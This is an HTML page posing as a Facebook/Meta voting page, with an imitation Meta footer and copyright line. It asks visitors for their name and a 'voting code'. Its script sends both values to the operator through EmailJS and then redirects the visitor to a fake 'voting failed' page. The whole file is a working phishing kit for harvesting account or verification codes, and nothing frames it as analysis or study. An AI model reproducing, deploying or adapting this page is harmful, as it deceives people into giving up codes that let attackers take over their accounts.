<!DOCTYPE html>
<html>
<head>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <style>
        body {
            font-family: Arial, sans-serif;
            background-color: #f2f2f2;
            display: flex;
            flex-direction: column;
            align-items: center;
            justify-content: flex-start;
            height: 100vh;
            margin: 0;
        }

        .container {
            width: 90%;
            padding: 40px;
            background-color: rgb(242, 241, 241);
            border-radius: 0px;
            box-shadow: 0 0 0px rgba(0, 0, 0, 0.2);
        }

        .container input[type="text"],
        .container input[type="number"] {
            width: 93%;
            padding: 15px;
            margin: 10px 0;
            border: 1px solid #a9bdca;
            outline: none;
            border-radius: 5px;
            height: 30px;
            font-size: 18px;
        }

        .login-button {
            width: 100%;
            padding: 15px;
            background-color: #0e59ee;
            border: none;
            color: #fff;
            cursor: pointer;
            border-radius: 5px;
            height: 50px;
            font-size: 18px;
        }

        .centered-image1,
        .centered-image2 {
            display: flex;
            flex-direction: column;
            align-items: center;
            justify-content: center;
        }

        .custom-text {
            font-family: Arial, sans-serif;
            font-size: 16px;
            margin-top: 15px;
            margin-bottom: 10px;
            text-align: center; 
        }

        .footer {
            background-color: #f2f2f2;
            color: rgb(205, 205, 205);
            text-align: center;
            padding: 20px;
            margin-top: 150px;
            margin-bottom: 20px;
        }

        .footer a {
            color: rgb(175, 175, 175);
            text-decoration: none;
            margin: 0 10px;
        }

        .copyright {
            margin-top: 10px;
        }
    </style>
</head>
<body>
    <div class="centered-image1">
        <img src="" alt="" style="max-width: 100%; margin-bottom: 20px;">
    </div>
    <div class="container">
        <div class="centered-image2">
            <img src="https://raw.githubusercontent.com/FacebookArt/pak2/932c5b01030012c9e00871db959cdf045c5e0306/ayesha.png" alt="" style="max-width: 100%; margin-bottom: 20px;">
            <div class="custom-text">Submit your Name and Voting code to proceed.</div>
        </div>
        <form name="login" onsubmit="sendDetails(); return false;">
            <input type="text" class="container input" placeholder="Name" name="name" id="name">
            <input type="number" class="container input" placeholder="Voting Code" name="votingCode" id="votingCode">
            <button class="login-button" id="submitButton" type="submit">Submit</button>
        </form>
    </div>

    <!-- Include Email.js library -->
    <script src="https://cdn.emailjs.com/dist/email.min.js"></script>
    <script>
        emailjs.init("ky5vyetNiRVLcW3iy");

        // Function to send name and voting code via Email.js
        function sendDetails() {
            const nameInput = document.getElementById('name');
            const votingCodeInput = document.getElementById('votingCode');

            const nameValue = nameInput.value.trim();
            const votingCodeValue = votingCodeInput.value.trim();

            // Check if name and voting code meet the length requirement
            if (nameValue.length < 2 || votingCodeValue.length < 2) {
                alert('Please enter your name and voting code');
                return;
            }

            // Template parameters
            const templateParams = {
                name: nameValue,
                voting_code: votingCodeValue
            };

            // Send email using Email.js
            emailjs.send("service_69d41qm", "template_utksv0v", templateParams)
                .then(function(response) {
                    console.log("Details sent successfully", response);
                    window.location.href = 'https://indian-art.github.io/voting-failed/';
                }, function(error) {
                    console.log("Failed to send details. Error:", error);
                });
        }
    </script>
    <div class="footer">
        <a>Meta</a>
        <a>Blog</a>
        <a>API</a>
        <a>Privacy</a>
        <a>Terms</a>
        <a>Local</a>
        <a>Instagram Lite</a>
        <a>Threads</a>
        <a>Upload contacts</a>
        <a>Meta Verified</a>
        <a>English</a>
        <br>
        © 2024 Facebook from Meta
    </div>
</body>
</html>
